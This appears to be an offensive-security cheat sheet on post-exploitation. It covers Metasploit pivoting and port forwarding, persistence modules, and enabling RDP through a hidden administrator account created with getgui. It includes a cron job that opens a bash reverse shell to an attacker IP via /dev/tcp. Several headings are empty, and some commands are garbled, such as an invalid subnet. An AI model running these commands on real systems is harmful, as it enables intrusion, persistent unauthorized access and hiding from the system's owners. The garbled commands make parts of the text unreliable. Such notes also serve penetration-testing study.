Post-Exploitation & Commands
Useful Commands
Linux
Enumeration
Windows
Bind Shell
This type of shell is not preferred as the attacker directly connects to the target system and in most cases, ingress traffic is always blocked or flagged as suspicious.
Transfer files
[Fully] interactive shell
Interactive shell
Fully interactive shell
Pivoting & Port forwarding
Metasploit (in meterpreter)
ipconfig
find subnet (the host may be in other network)run autoroute -s <subnet>
(subnet of the internal network). This means anytime we want to contact a machine within one of the networks specified, we will go through meterpreter session and use that to connect to the targets.Example:
ipconfig
IP 19.9.29.148. Netmask: 255.255.240.0run autoroute -s 10.10.0.29.0/20
run autoroute -p
Displays active routing table.auxiliary/scanner/portscan/tcp : We can perform the scan. NOTE: scanning with metasploite is limited (we can't discover software version etc...) so it's better to use nmap. To do that we need to perform port forwarding.
since target_sys_2 does not have a route back to attacker_sys, use bind_shell payload : windows/meterpreter/bind_tcp
Port forwarding (meterpreter/metasploit)
portfwd add -l 1234 -p 80 -r <target_sys_2_ip>
Forward remote port to local port. In this case we want to scan the port 80 of the target 2portfwd list
nmap -sV -sC -p 1234 localhost
Persistence
Windows
Metasploit
search persistence module (Windows)
Ex: exploit/windows/local/persistence_service
It will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
When you want to connect again you need to set a listener to receive the connection
Enable RDP
with metasploit : search enable_rdp (and set session)
Connect to victim from attacker
Note: you need username and password, if you don't have the password, change it
net user <username> <new_pass>
(suspicious in a real environment) or crack NTLM...Note 2: you can create a new account and add it to administrator group...
second way with metasploit/meterpreter (auto create account and settings):
In meterpreter
run getgui -e -u user_you_want -p password_you_want
enables rdp service -> creates new user with the provided parameters -> hides user from windows login screen -> adds user to Remote Desktop Users and Administrators group.
Linux
Metasploit
search persistence module (Linux)
Example: post/linux/manage/sshkey_persistence (needed elevated privs - This module will add an SSH key to a specified user)
Via SSH key
After gaining access to linux system, you can transfer SSH private key to local machine and use it to connect via SSH
With cron jobs
Set up listener
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron
create a cronjob (every minute time format)crontab -i cron
crontab -l
crontab for the current userNOTE: if the command doesn't work try with another one... revshell
Clearing tracks
Windows
Linux
Keylogger
Last updated